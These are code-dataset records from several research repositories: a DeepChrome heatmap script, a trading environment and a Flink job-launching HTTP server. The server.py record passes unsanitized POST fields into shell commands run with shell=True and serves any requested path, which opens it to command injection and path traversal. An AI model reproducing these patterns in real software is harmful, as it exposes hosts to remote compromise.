"cclib.io", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cclib.io.cjsonwriter.CJSON", "line_number": 20, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cclib.io.ccread", "line_number": 28, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cclib.io.cjsonwriter.CJSON", "line_number": 30, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 30, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 33, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cclib.io.ccopen", "line_number": 50, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 50, "usage_type": "attribute"}, {"api_name": "cclib.io.cjsonwriter.CJSON", "line_number": 52, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 52, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cclib.io.ccopen", "line_number": 60, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 60, "usage_type": "attribute"}, {"api_name": "cclib.io.cjsonwriter.CJSON", "line_number": 63, "usage_type": "call"}, {"api_name": "cclib.io", "line_number": 63, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 65, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "15097045165", "text": "import torch \nimport torch.nn as nn\nimport torch.nn.functional as F\nimport matplotlib as mpl\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport argparse as ap\nimport time as time\nimport random\nimport math\nimport scipy \nimport os\n\ndef set_device():\n # -- set the device used\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(f\"0. Using {device} device!\")\n return device\n\n# -- function for loading in the parsed data into tensor form\ndef load_data(ct, ds):\n num_windows = 100\n inputs = []\n\n xy = torch.from_numpy(np.loadtxt(f'{ds}/train.csv', delimiter=\",\",dtype=np.float32))\n num_rows = len(xy)\n num_cols = len(xy[0])\n num_genes = num_rows / num_windows\n marker = 0 \n data = {}\n num_zeros = 0\n num_ones = 0\n\n # -- set entries for data\n data[0] = []\n data[1] = []\n\n for i in range(len(xy)):\n if xy[i][num_cols-1]==0:\n num_zeros += 1\n if xy[i][num_cols-1]==1:\n num_ones += 1\n if (i+1) % num_windows==0:\n if xy[i][num_cols-1]==0:\n data[0].append((xy[i-99:i+1,2:num_cols-1], xy[i-99:i+1,[num_cols-1]]))\n if xy[i][num_cols-1]==1:\n data[1].append((xy[i-99:i+1,2:num_cols-1], xy[i-99:i+1,[num_cols-1]]))\n\n pos_weights = torch.tensor([num_zeros / num_ones])\n random_zero_idx = random.randint(0, len(data[0])-1)\n random_one_idx = random.randint(0, len(data[1])-1)\n inputs.append(ct) # -- use cell type to mark each input \n inputs.append(data[0][random_zero_idx])\n inputs.append(data[1][random_one_idx])\n # print(inputs[0][1][0][0])\n return inputs, pos_weights\n\ndef set_hyperparams(num_windows, n_e, hp_specs):\n # -- spec values \n width = num_windows\n learning_rate = 0.001\n num_epochs = n_e\n num_filters = 50\n hidden_layer_units = {\"first\": 625, \"second\": 125}\n\n if hp_specs == 4: \n filter_size = 10 \n pool_size = 5 \n elif hp_specs == 1: \n filter_size = 5\n pool_size = 2\n elif hp_specs == 2: \n filter_size = 5\n pool_size = 5\n elif hp_specs == 3:\n filter_size = 10 \n pool_size = 2\n\n return width, hidden_layer_units, num_filters, filter_size, pool_size, num_epochs, learning_rate\n\n# -- define convnet class\nclass ConvNet(nn.Module):\n def __init__(self, width, num_filters, filter_size, pool_size, hidden_layer_units:dict): \n super(ConvNet, self).__init__()\n self.conv = nn.Conv1d(in_channels=5, out_channels=num_filters, kernel_size=filter_size)\n self.pool = nn.MaxPool1d(kernel_size=pool_size)\n self.dropout = nn.Dropout(p=0.5)\n self.fc1 = nn.Linear(math.ceil((width-filter_size)/pool_size)*num_filters, hidden_layer_units[\"first\"])\n self.fc2 = nn.Linear(hidden_layer_units[\"first\"], hidden_layer_units[\"second\"])\n self.fc3 = nn.Linear(hidden_layer_units[\"second\"], 1)\n self.width = width\n self.filter_size = filter_size\n self.pool_size = pool_size \n self.num_filters = num_filters\n def forward(self, x): \n x = self.conv(x)\n x = F.relu(x)\n x = self.pool(x)\n x = x.view(math.ceil((self.width-self.filter_size)/self.pool_size)*self.num_filters)\n x = self.dropout(x)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n x = F.relu(x)\n x = self.fc3(x) \n return x\n\n\n# -- function for optimization \ndef opt(inputs:list, pos_weights, num_epochs, model_path, device, width, num_filters, filter_size, pool_size, hidden_layer_units):\n\n # -- dictionaries for all cell types\n outputs_dict = {}\n loss_dict = {}\n expressions_dict = {}\n\n # -- unpack inputs\n ct = inputs[0]\n\n # -- add in an empty list for the ct\n outputs_dict[ct] = []\n loss_dict[ct] = []\n expressions_dict[ct] = []\n\n # -- create the model \n model = ConvNet(width=width, num_filters=num_filters, filter_size=filter_size, pool_size=pool_size, hidden_layer_units=hidden_layer_units)\n\n for i in range(1, len(inputs)): # -- enter the training loop \n\n # -- create loss list for each cell type \n losses = []\n\n # -- load in model's parameters for EACH cell type \n model.load_state_dict(torch.load(f'{model_path}/{ct}_params.pth'))\n model.eval()\n\n # -- set up custom parameter group for optimizer\n s = inputs[i][0]\n s.requires_grad_(True)\n bin_list = {s}\n\n # -- set universal hyperparams for all cell types \n learning_rate=0.1\n momentum=0.9\n lda=0.009\n \n # -- set optimizer and loss function \n optimizer = torch.optim.SGD(bin_list, lr=learning_rate, momentum=momentum, weight_decay=lda)\n pos_weights = pos_weights.to(device)\n criterion = nn.BCEWithLogitsLoss(pos_weight=pos_weights)\n\n for epoch in range(num_epochs):\n samples = inputs[i][0].permute(1,0)\n samples = samples.to(device)\n labels = inputs[i][1][0]\n labels = labels.to(device)\n model.to(device)\n predicted = model(samples)\n loss = criterion(predicted, labels) \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # -- print the loss\n print (f'Epoch [{epoch+1}/{num_epochs}], Loss: {loss.item():.4f}')\n losses.append(loss.item())\n \n #-- get the output\n pg = optimizer.param_groups\n output = pg[0]['params'][0].detach().numpy() \n outputs_dict[ct].append(output)\n loss_dict[ct].append(losses)\n expressions_dict[ct].append(inputs[i][1][0].item())\n\n return outputs_dict, loss_dict, expressions_dict\n\ndef norm(raw_outputs_tuple, ct):\n all_normalized_arrs = {}\n\n # -- get the maximum of all the features \n curr_max = 0\n for sub_array in raw_outputs_tuple:\n if np.amax(sub_array, axis=0) > curr_max:\n curr_max = np.amax(sub_array, axis=0) \n\n norm_array = []\n for sub_array in raw_outputs_tuple:\n normalized = np.clip(sub_array / curr_max, 0, 1) # -- clamp to range of [0,1] and normalize with max\n norm_array.append(normalized)\n norm_array = np.array(norm_array)\n\n all_normalized_arrs[ct] = norm_array\n\n return all_normalized_arrs\n\ndef plot_heatmap(cell_type, all_normalized_arrs, mods_to_frequencies, color_list, histone_mods, bins, expression_val, o_dir):\n\n # -- plot the graph for heatmap + barplot \n f, a = plt.subplots(2, 1, figsize=(15,6) ,layout='constrained')\n\n # -- set custom titles based on expression value for the given sample \n a[0].set_title(f'Bar Graph of Active Bins per Modification for {cell_type}', fontsize=10)\n a[0].bar(histone_mods, mods_to_frequencies, color=color_list, width=0.2)\n\n # -- set custom titles based on expression value for the given sample \n if expression_val == 1:\n a[1].set_title(f'Heatmap of Bins for {cell_type}. Gene Expression = High', fontsize=10)\n elif expression_val == 0:\n a[1].set_title(f'Heatmap of Bins for {cell_type}. Gene Expression = Low', fontsize=10)\n \n # -- create custom colorbar (not discretized)\n img = a[1].imshow(all_normalized_arrs)\n cbar = a[1].figure.colorbar(img, ax=a[1], shrink=0.2, pad=0.01)\n cbar.ax.set_ylabel('', rotation=-90, va=\"bottom\")\n\n # -- show all the ticks and label them with respective entries (if specified)\n a[1].set_yticks(np.arange(0, 5, 1)-0.5, labels=histone_mods)\n a[1].set_xticks(np.arange(-1.5, 99, 1)+1)\n a[1].tick_params(axis='y', which='major', labelsize=6)\n a[1].tick_params(axis='x', which='major', labelsize=2)\n\n # -- create grid to distinguish between cells\n a[1].grid(color='black', visible=True, which='both',linestyle='-',linewidth=0.3)\n\n # -- save the file to specified output folder\n if o_dir != 'DELETE':\n plt.savefig(f'{o_dir}/{cell_type}_{expression_val}_heatmap.png')\n \n# == optional function for plotting loss (atm evidently all over the place)\ndef plot_loss(cell_type, num_epochs, loss):\n f, a = plt.subplots(layout='constrained') \n f.suptitle(f'Evaluation Loss for {cell_type}') \n a.plot(num_epochs, loss, label='Loss')\n a.set_xlabel('Number of Epochs')\n a.set_ylabel('Loss')\n a.legend() \n\ndef main():\n\n # -- argparser: what args to look for? \n # -- ** note that -h can be used to reference what these flags are / their meaning\n # -- input list of cell types to parse and visualize\n parser = ap.ArgumentParser(prog='Visualization of Deepchrome!', description='Please specify the cell-types to visualize below.')\n parser.add_argument('-d', type=str, help='-> input name of dataset directory to use', nargs=1)\n parser.add_argument('-sm', type=str, help= '-> input name of folder where saved model params are located')\n parser.add_argument('-e', type=int, help='-> input number of epochs that the model should optimize through', nargs=1)\n parser.add_argument('-hp', type=int, help='-> input 1 for (5,2) 2 for (5,5) 3 for (10,2) 4 for (10,5) to specify hp',default=4)\n parser.add_argument('-o',type=str, help='-> input name of folder where results should be saved')\n args = vars(parser.parse_args())\n\n # -- set necessary parameters from parsed in information\n data_directory = args['d'][0]\n num_epochs = args['e'][0]\n model_path = args['sm']\n hp_specs = args['hp']\n output_dir = args['o']\n\n lowest_dirs = []\n for root, dirs, files_ignore in os.walk(data_directory): # -- get lowest directories \n if not dirs: \n lowest_dirs.append(root)\n \n all_cell_types = next(os.walk(data_directory))[1] # -- this obtains the cell types\n eval_datasets = [] # -- list of the (ct, corres. to lowest possible directory) -- without reaching into files\n\n marker = 0\n for dirs in lowest_dirs:\n # -- run the functions proper with parsed in data from above\n device = set_device()\n data_outputs, pos_weights = load_data(ds=dirs, ct=all_cell_types[marker])\n width, hidden_layer_units, num_filters, filter_size, pool_size, num_epochs, learning_rate = set_hyperparams(num_windows=100, n_e=num_epochs, hp_specs=hp_specs)\n outputs_dict, loss_dict, expressions_dict = opt(inputs=data_outputs, pos_weights=pos_weights, num_epochs=num_epochs, model_path=model_path, device=device, width=width, num_filters=num_filters, filter_size=filter_size, pool_size=pool_size, hidden_layer_units=hidden_layer_units)\n \n # -- define parameters for plotting functions\n histone_mods = ['H3K27me3 (R)', 'H3K36me3 (P)','H3K4me1 (DP)', 'H3K4me3 (P)', 'H3K9me3 (R)']\n bins = np.linspace(0, 99, 100).astype(int)\n\n for ct, raw_output_list in outputs_dict.items():\n for idx, item in enumerate(raw_output_list): \n # -- normalize the outputs \n all_normalized_dict = norm(raw_outputs_tuple=item, ct=ct)\n \n # -- plot everything \n d = np.swapaxes(all_normalized_dict[ct], 1, 0)\n mods_to_frequencies = []\n for row in d:\n frequency = 0\n for bins in row:\n if bins >= 0.25: \n frequency+=1\n mods_to_frequencies.append(frequency) \n avg = np.mean(mods_to_frequencies)\n color_list = []\n for frequencies in mods_to_frequencies:\n if frequencies > avg:\n color_list.append(\"black\")\n elif frequencies < avg:\n color_list.append(\"gray\")\n\n plot_heatmap(cell_type=ct, all_normalized_arrs=d, mods_to_frequencies=mods_to_frequencies, color_list=color_list, \n histone_mods=histone_mods, bins=bins, expression_val=expressions_dict[ct][idx], o_dir=output_dir)\n\n # -- update the marker \n marker+=1\n\nif __name__ == '__main__':\n main()", "repo_name": "nickkim1/deepchrome_reimplementation", "sub_path": "optim.py", "file_name": "optim.py", "file_ext": "py", "file_size_in_byte": 12034, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.device", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 49, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 50, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 87, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 97, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.optim.SGD", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torch.nn.BCEWithLogitsLoss", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.amax", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 243, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 259, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.swapaxes", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 292, "usage_type": "call"}]} +{"seq_id": "42746866606", "text": "import yfinance as yf\n\nimport gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\nimport numpy as np\n\nfrom ta import add_all_ta_features\nfrom ta.utils import dropna\n\nfrom trading_gym.feature_gen import FeatureGenerator\n\n\nfrom tf_agents.environments import py_environment\nfrom tf_agents.environments import tf_environment\nfrom tf_agents.environments import tf_py_environment\nfrom tf_agents.environments import utils\nfrom tf_agents.specs import array_spec\nfrom tf_agents.environments import wrappers\nfrom tf_agents.environments import suite_gym\nfrom tf_agents.trajectories import time_step as ts\n\n\nSTART_INDEX = 0\nMAX_INDEX = 2000\nWINDOW = 200\nAVAILABLE_TICKERS = [\"MSFT\"]\n\n\ndef fetch_data(period, intervall):\n states = []\n for ticker in AVAILABLE_TICKERS:\n states.append(yf.Ticker(ticker).history(\n period=period, interval=intervall, auto_adjust=True).reset_index())\n return states\n\n\nclass Bank():\n def __init__(self, period, interval):\n self.time = np.random.randint(low=0, high=MAX_INDEX-WINDOW)\n self.tickers = []\n\n states = fetch_data(period, interval)\n for state in states:\n state_edit = state.drop(columns=['Dividends', 'Stock Splits'])\n state_edit = dropna(state_edit)\n state_edit = state_edit.reset_index()\n # state_edit = add_all_ta_features(\n # state_edit, open=\"Open\", high=\"High\", low=\"Low\", close=\"Close\", volume=\"Volume\", fillna=True)\n self.tickers.append(state_edit)\n # state.iloc[START_INDEX:START_INDEX+WINDOW][[\"High\", \"Low\", \"Close\", \"Volume\"]].to_numpy())\n self.tick()\n\n def get_price(self, ticker):\n index = AVAILABLE_TICKERS.index(ticker)\n return self.state[index].iloc[-1][\"Close\"]\n\n def get_ticker_states(self):\n return self.state\n\n def reached_limit(self):\n return self.time >= MAX_INDEX\n\n def tick(self):\n self.time += 1\n\n # if self.time % 100 == 0:\n # print(\"Time: \" + str(self.time))\n\n self.state = []\n for curr in self.tickers:\n self.state.append(\n curr.iloc[START_INDEX+self.time:START_INDEX+WINDOW+self.time]\n )\n\n #self.tickers = np.array(self.tickers)\n\n\nclass Portfolio():\n def __init__(self, period, interval, cash=1000, order_price=0, sell_price=0):\n self.cash = cash\n self.portfolio = {\"cash\": cash, \"stocks\": {}}\n self.order_price = order_price\n self.sell_price = sell_price\n self.bank = Bank(period, interval)\n\n self.num_sells = 0\n self.num_buys = 0\n\n def buy(self, ticker, amount):\n price = self.bank.get_price(ticker)\n if price > self.cash:\n return -1\n\n self.cash -= price + self.order_price\n\n self.portfolio[\"cash\"] = self.cash\n\n if ticker not in self.portfolio[\"stocks\"]:\n self.portfolio[\"stocks\"][ticker] = 0\n\n self.portfolio[\"stocks\"][ticker] += 1\n self.num_buys += 1\n return 0\n\n def sell(self, ticker, amount):\n\n if not ticker in self.portfolio[\"stocks\"]:\n return -1\n\n if self.portfolio[\"stocks\"][ticker] < amount:\n return -1\n\n price = self.bank.get_price(ticker)\n\n self.cash += (price * amount) - self.sell_price\n\n self.portfolio[\"cash\"] = self.cash\n\n self.portfolio[\"stocks\"][ticker] -= amount\n self.num_sells += 1\n return 0\n\n def get_worth(self):\n worth = self.cash\n for ticker in self.portfolio[\"stocks\"]:\n worth += self.portfolio[\"stocks\"][ticker] * \\\n self.bank.get_price(ticker)\n\n return worth\n\n def get_state(self):\n return self.portfolio, self.bank.get_ticker_states()\n\n def tick(self):\n self.bank.tick()\n\n\nclass BrokerEnv(gym.Env):\n metadata = {'render.modes': ['human']}\n\n def __init__(self, period=\"10y\", interval=\"1d\"):\n self.period = period\n self.interval = interval\n self.feature_gen = FeatureGenerator()\n self.reset()\n self.worth = self.portfolio.get_worth()\n\n def _get_state(self):\n return self.portfolio.get_state()\n\n def get_portfolio(self):\n return self.portfolio\n\n def reset(self):\n self.portfolio = Portfolio(self.period, self.interval)\n self.worth = self.portfolio.get_worth()\n return self.feature_gen.generate(self._get_state())\n\n def render(self, mode):\n print(\"State: \" + str(self.portfolio.get_state()\n [0]) + \"\\nValue: \" + str(self.worth))\n\n print(\"Sells: \" + str(self.portfolio.num_sells))\n print(\"Buys: \" + str(self.portfolio.num_buys))\n print(\"-----------\\n\\n\")\n\n def step(self, action):\n \"\"\"\n action: List of tuples with (\"TICKER\", action) where action: buy=0, sell=1, hold=2\n \"\"\"\n action = [(\"MSFT\", action)]\n self.portfolio.tick()\n\n outcome = 0\n for (ticker, order) in action:\n if order == 0:\n outcome += self.portfolio.buy(ticker, 1)\n elif order == 1:\n outcome += self.portfolio.sell(ticker, 1)\n\n difference = self.portfolio.get_worth() - self.worth\n self.worth = self.portfolio.get_worth()\n\n info = {\"tickers\": AVAILABLE_TICKERS}\n\n return self.feature_gen.generate(self._get_state()), difference, False, info\n\n\nclass BrokerEnvTF(py_environment.PyEnvironment):\n\n def __init__(self, period=\"10y\", interval=\"1d\"):\n self.period = period\n self.interval = interval\n self.feature_gen = FeatureGenerator()\n self.reset()\n self.worth = self.portfolio.get_worth()\n\n self._action_spec = array_spec.BoundedArraySpec(\n shape=(), dtype=np.int32, minimum=0, maximum=2, name='action')\n\n self._observation_spec = array_spec.BoundedArraySpec(\n shape=(1, 997,), dtype=np.float64, name='observation')\n\n def action_spec(self):\n return self._action_spec\n\n def observation_spec(self):\n return self._observation_spec\n\n def get_portfolio(self):\n return self.portfolio\n\n def _reset(self):\n self.portfolio = Portfolio(self.period, self.interval)\n self.worth = self.portfolio.get_worth()\n return ts.restart(\n #np.array([[0, 2], [2, 3]], dtype=np.int32),\n self.feature_gen.generate(self._get_state()),\n )\n\n def _render(self, mode):\n print(\"State: \" + str(self.portfolio.get_state()\n [0]) + \"\\nValue: \" + str(self.worth))\n\n print(\"Sells: \" + str(self.portfolio.num_sells))\n print(\"Buys: \" + str(self.portfolio.num_buys))\n print(\"-----------\\n\\n\")\n\n def _get_state(self):\n return self.portfolio.get_state()\n\n def _step(self, action):\n \"\"\"\n action: List of tuples with (\"TICKER\", action) where action: buy=0, sell=1, hold=2\n \"\"\"\n action = [(\"MSFT\", action)]\n self.portfolio.tick()\n\n difference = 0\n outcome = 0\n for (ticker, order) in action:\n if order == 0:\n outcome += self.portfolio.buy(ticker, 1)\n elif order == 1:\n outcome += self.portfolio.sell(ticker, 1)\n else:\n # Punish for not performing an action\n difference = -10\n\n difference += self.portfolio.get_worth() - self.worth\n\n # Punish illegal action\n difference += 10 * outcome\n\n self.worth = self.portfolio.get_worth()\n\n info = {\"tickers\": AVAILABLE_TICKERS}\n\n \"\"\"\n When time limit is reached return termination to avoid out of bounds\n \"\"\"\n if self.portfolio.bank.reached_limit():\n return ts.termination(\n self.feature_gen.generate(self._get_state()),\n reward=difference,\n )\n\n return ts.transition(\n self.feature_gen.generate(self._get_state()),\n reward=difference,\n discount=0.1\n )\n", "repo_name": "ju-leon/NEATBroker", "sub_path": "trading_gym/broker.py", "file_name": "broker.py", "file_ext": "py", "file_size_in_byte": 8079, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "yfinance.Ticker", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 40, "usage_type": "attribute"}, {"api_name": "ta.utils.dropna", "line_number": 46, "usage_type": "call"}, {"api_name": "gym.Env", "line_number": 139, "usage_type": "attribute"}, {"api_name": "trading_gym.feature_gen.FeatureGenerator", "line_number": 145, "usage_type": "call"}, {"api_name": "tf_agents.environments.py_environment.PyEnvironment", "line_number": 190, "usage_type": "attribute"}, {"api_name": "tf_agents.environments.py_environment", "line_number": 190, "usage_type": "name"}, {"api_name": "trading_gym.feature_gen.FeatureGenerator", "line_number": 195, "usage_type": "call"}, {"api_name": "tf_agents.specs.array_spec.BoundedArraySpec", "line_number": 199, "usage_type": "call"}, {"api_name": "tf_agents.specs.array_spec", "line_number": 199, "usage_type": "name"}, {"api_name": "numpy.int32", "line_number": 200, "usage_type": "attribute"}, {"api_name": "tf_agents.specs.array_spec.BoundedArraySpec", "line_number": 202, "usage_type": "call"}, {"api_name": "tf_agents.specs.array_spec", "line_number": 202, "usage_type": "name"}, {"api_name": "numpy.float64", "line_number": 203, "usage_type": "attribute"}, {"api_name": "tf_agents.trajectories.time_step.restart", "line_number": 217, "usage_type": "call"}, {"api_name": "tf_agents.trajectories.time_step", "line_number": 217, "usage_type": "name"}, {"api_name": "tf_agents.trajectories.time_step.termination", "line_number": 264, "usage_type": "call"}, {"api_name": "tf_agents.trajectories.time_step", "line_number": 264, "usage_type": "name"}, {"api_name": "tf_agents.trajectories.time_step.transition", "line_number": 269, "usage_type": "call"}, {"api_name": "tf_agents.trajectories.time_step", "line_number": 269, "usage_type": "name"}]} +{"seq_id": "34092391391", "text": "#!/usr/bin/env python\n\"\"\"\nVery simple HTTP server in python (Updated for Python 3.7)\n\nUsage:\n\n ./dummy-web-server.py -h\n ./dummy-web-server.py -l localhost -p 8000\n\nSend a GET request:\n\n curl http://localhost:8000\n\nSend a HEAD request:\n\n curl -I http://localhost:8000\n\nSend a POST request:\n\n curl -d \"foo=bar&bin=baz\" http://localhost:8000\n\n\"\"\"\nimport re\nimport json\nimport argparse\nimport os\nimport subprocess\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom io import BytesIO\n\njobs = []\n\n\nclass S(BaseHTTPRequestHandler):\n def _set_headers(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n \n def do_GET(self):\n root = os.path.dirname(os.path.realpath(__file__))\n if self.path == '/':\n filename = root + '/index.html'\n else:\n filename = root + self.path\n \n self.send_response(200)\n if filename[-4:] == '.css':\n self.send_header('Content-type', 'text/css')\n elif filename[-5:] == '.json':\n self.send_header('Content-type', 'application/javascript')\n elif filename[-3:] == '.js':\n self.send_header('Content-type', 'application/javascript')\n elif filename[-4:] == '.ico':\n self.send_header('Content-type', 'image/x-icon')\n else:\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n with open(filename, 'rb') as fh:\n html = fh.read()\n self.wfile.write(html)\n \n def do_POST(self):\n global jobs\n content_len = int(self.headers.get('Content-Length'))\n if self.path == '/start':\n tmp_body = self.rfile.read(content_len).decode()\n body = json.loads(tmp_body)\n cmd = 'flink run --parallelism 16 -d $ARTIFACTS/$JOB_NAME '\n cmd += ' --algorithm ' + str(body[\"algorithm\"])\n cmd += ' --W \"' + str(body[\"w\"]) + '\"'\n cmd += ' --S \"' + str(body[\"s\"]) + '\"'\n cmd += ' --k \"' + str(body[\"k\"]) + '\"'\n cmd += ' --R \"' + str(body[\"r\"]) + '\"'\n cmd += ' --dataset ' + str(body[\"dataset\"])\n cmd += ' --partitioning ' + str(body[\"partitioning\"])\n cmd += ' --sample_size ' + str(body[\"treeNumber\"])\n cmd += ' --partitions \"' + str(body[\"partitions\"]) + '\"'\n cmd += ' --distance \"' + str(body[\"distance\"]) + '\"'\n cmd += ' --policy ' + str(body[\"adaptivity\"])\n if body[\"adaptivity\"] != \"static\":\n cmd += ' --adapt_range ' + str(body[\"range\"])\n cmd += ' --adapt_over ' + str(body[\"overload\"])\n cmd += ' --adapt_cost ' + str(body[\"cost_function\"])\n cmd += ' --buffer_period ' + str(body[\"buffer_period\"])\n if body[\"adaptivity\"] == \"advanced\":\n cmd += ' --adapt_queue ' + str(body[\"queue\"])\n cmd += ' --adapt_under ' + str(body[\"underload\"])\n cmd += ' && flink run -d -c custom_source.Custom_source $ARTIFACTS/$JOB_NAME --dataset ' + body[\"dataset\"]\n result = subprocess.run([cmd], shell=True, stdout=subprocess.PIPE).stdout.decode('utf-8')\n jobs = [r.split()[1] for r in re.findall(\"JobID \\w*\", result)]\n elif self.path == '/stop':\n for job in jobs:\n cmd = 'flink cancel ' + job\n result = subprocess.run([cmd], shell=True, stdout=subprocess.PIPE).stdout.decode('utf-8')\n self.send_response(200)\n self.end_headers()\n response = BytesIO()\n self.wfile.write(response.getvalue())\n\n\ndef run(server_class=HTTPServer, handler_class=S, addr=\"0.0.0.0\", port=8000):\n server_address = (addr, port)\n httpd = server_class(server_address, handler_class)\n\n print(\"Starting httpd server\")\n httpd.serve_forever()\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"Run a simple HTTP server\")\n parser.add_argument(\n \"-l\",\n \"--listen\",\n default=\"0.0.0.0\",\n help=\"Specify the IP address on which the server listens\",\n )\n parser.add_argument(\n \"-p\",\n \"--port\",\n type=int,\n default=8000,\n help=\"Specify the port on which the server listens\",\n )\n args = parser.parse_args()\n run(addr=args.listen, port=args.port)\n", "repo_name": "tatoliop/PROUD-PaRallel-OUtlier-Detection-for-streams", "sub_path": "docker/outliers_flink/assets/server/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 4408, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "52", "api": [{"api_name": "http.server.BaseHTTPRequestHandler", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 41, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 68, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 90, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 90, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 91, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 95, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 95, "usage_type": "attribute"}, {"api_name": "io.BytesIO", "line_number": 98, "usage_type": "call"}, {"api_name": "http.server.HTTPServer", "line_number": 102, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 112, "usage_type": "call"}]} +{"seq_id": 